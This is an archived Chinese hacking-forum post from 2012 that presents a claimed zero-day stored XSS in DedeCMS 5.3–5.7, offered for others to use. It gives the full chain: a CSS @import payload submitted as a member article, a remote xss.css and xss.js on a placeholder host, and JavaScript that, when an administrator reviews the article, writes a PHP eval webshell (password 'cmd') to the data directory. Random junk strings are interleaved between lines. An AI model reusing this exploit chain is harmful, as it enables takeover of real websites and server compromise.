中国网络渗透测试联盟
标题:
dedecms xss oday通杀所有版本 可getshell
[打印本页]
作者:
admin
时间:
2012-9-15 13:56
标题:
dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
- z( D& P9 f7 ~7 H7 T
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
* e& \, A' N1 d1 m
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
' o8 z. E0 t: K3 i0 I3 e# t
下面说说利用方法。
) M2 W9 x; f1 \9 K% @
条件有2个:
K. b' q* A5 V) m7 W$ j2 s
1.开启注册
% b, A' S" Y- T/ P
2.开启投稿
, S0 l5 f9 E, D' U
注册会员----发表文章
# Q9 m0 O9 i; m1 G/ q5 A
内容填写:
% ~4 w( w. y+ p" v' G! J
复制代码
$ g/ r7 _: U: w0 h3 z: u+ A: ~, h# n
<style>@im\port'\
http://xxx.com/xss.css';
</style>
- _( l- D& m4 f1 K
新建XSS.Css
! B& t: ?7 d, w. X
复制代码
' D) i+ F& o6 s1 s& A
.body{
5 G( G M6 o. X- ~7 l+ T
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
2 M' w; ^7 @( H6 G9 F# K
新建xss.js 内容为
, i% [$ C" H: `2 a# D! g
复制代码
3 ]4 \8 p0 j- ]; h
1.var request = false;
, K/ Z; \8 Q3 N
2.if(window.XMLHttpRequest) {
+ f' R: \' U* f2 d& S( a
3.request = new XMLHttpRequest();
; w( t% X5 n W: [2 m8 D
4.if(request.overrideMimeType) {
. W) R+ X$ a$ T8 ^+ W: R1 C, w
5.request.overrideMimeType('text/xml');
# g* ?- Z" e* x( |* n
6.}
1 }% Y( v9 h% _! r
7.} else if(window.ActiveXObject) {
1 Z# R: o i- S$ ]& b' f6 E) S& F' z) A
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
) [8 Q* g* s7 V% f; Y! z' \8 U! v
9.for(var i=0; i<versions.length; i++) {
; }+ [: l9 h# \- K/ L3 |( T
10.try {
# P* V t: J! \! \! j K& x
11.request = new ActiveXObject(versions);
8 p& Z" U6 h" |# G1 W: a6 g
12.} catch(e) {}
. @5 a4 T( l4 |! X, Y
13.}
5 w" t$ ]$ X( Y5 R
14.}
+ m; I- j+ y1 J, x, z
15.xmlhttp=request;
5 \) G# L" Z7 v) j: `' k
16.function getFolder( url ){
( S+ E! C* H' s4 [# ~% i( g, i
17. obj = url.split('/')
v5 n* M# O0 i5 q: o2 j
18. return obj[obj.length-2]
' R6 s( j; V. w9 q1 S8 [
19.}
0 T6 Q& A4 `( ` m4 O( {! P
20.oUrl = top.location.href;
% W: `( t7 f8 C. {: f
21.u = getFolder(oUrl);
; i2 O& H* Q! u
22.add_admin();
1 E G# V& l3 G) }
23.function add_admin(){
6 P" P6 [$ E3 b9 a/ ], h8 d
24.var url= "/"+u+"/sys_sql_query.php";
. V1 Y: U9 B& [# s- t# w1 I
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
3 Q. l3 y, D6 o2 m9 f3 r; r' E
26.xmlhttp.open("POST", url, true);
2 J+ ?* b5 L1 G' z$ _/ p x) t
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
* f8 k+ x: {9 d
28.xmlhttp.setRequestHeader("Content-length", params.length);
! n) O e H* N q+ X: {2 ~" H$ v
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
, P$ u( z0 z. h8 T' ^* {/ Y9 l3 Q
30.xmlhttp.send(params);
( ~# s% i1 l9 t& N- q! f& S7 T# p6 M
31.}
( Y+ y& W, q! c, ]4 g' }- Y
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2